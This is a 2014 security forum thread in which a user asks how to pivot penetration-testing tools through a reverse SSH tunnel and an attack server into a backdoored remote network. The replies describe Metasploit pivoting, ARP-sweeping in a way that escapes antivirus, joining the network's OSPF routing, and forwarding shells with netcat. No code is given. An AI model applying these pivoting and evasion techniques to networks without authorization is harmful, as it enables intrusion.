catesby Posted January 6, 2014 Share Posted January 6, 2014 hello everyone. for all those guys and gals who are longtime members, sorry, another pivoting help request. I have tried quite a few things now, read lots, watched videos, spoken to like minded people and I still can't get my head round getting this particular problem. All help would be much appreciated. I have a deadline of thursday night to get to grips with this and get it working... Scenario: I have a backdoor device (bdd) sitting on a remote network with for ease of this post 111.111.111.1 the bdd is connected to an attack server via a reverse ssh tunnel. say myAttackServer.com the attack server is pretty much on lockdown and there is no access to any tools on the server, however Ssh is allowed. Goal. Using my laptop installed with Kali linux, my goal to is to pen-test the 111.111.111.1 network by running the programs on my laptop, through the myAttackServer.com and into the bdd. "laptop - nmap" >> myAttackServer.com >> "bdd - 111.111.111.1" i have proxy chains installed. i have totally confused myself. please please help me. many thanks. Quote Link to comment Share on other sites More sharing options...
digip Posted January 7, 2014 Share Posted January 7, 2014 It is sometimes possible to nmap scan through a session using metasploit in post exploitation, even with Armitage helping to automate it and see the connections in a gui interface what nodes are connected and then pivot to them, but you could also stay under the radar a bit if on the remote machine if all you have is SSH into it at this point, if you wrote a manual script to arp sweep the network for other nodes to try and then scan. If windows, a simple bat script, if linux, a shell script. Just ping the range of IP's one at a time and every so often run an arp, to check and **log their mac address to IP address. Then check the log for what its found. Even machines ignoring a ping, will return an arp, if they are alive on the network, which is one way to find nodes on a network, without having to try and copy over something like nmap onto the compromised host, which might get picked up by AV software or such. Then from there, if you have your target machines, figure out how to scan them for services. If using metasploit though, you should be able to use an encrypted tunnel to the reverse shell machine and scan the inner network through the session using post exploitation modules. Places that may help, http://www.offensive-security.com/metasploit-unleashed/Pivoting security tube, and youtube videos. Quote Link to comment Share on other sites More sharing options...
kerpap Posted January 15, 2014 Share Posted January 15, 2014 does your backdoor device support VPN? meaning could you configure an IPSEC tunnel to your attackserver.com server? or a router to the bdd VPN? I see potentially if this is possible, you could get a router and configure a VPN to the bdd. if you can do a little on-site packet sniffing you might enumerate what routing protocol is running. most likely OSPF and you might be able to add the router to the OSPF area which would be really cool because the router would have the whole network topology on it as OSPF is a link-state routing protocol. Quote Link to comment Share on other sites More sharing options...
ksecurity Posted January 31, 2014 Share Posted January 31, 2014 Hey Catesby, A popular option (if available to you) is to install kali on your attack server, ssh right into it, bob's your uncle. Some fun stuff you can do with netcat (or even ncat with --allow and --ssl flags) to forward or reverse the shell of the attack server right to your laptop. Might make the routing easier on you if you move the attacking OS onto the server. Can still keep kali on the laptop. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.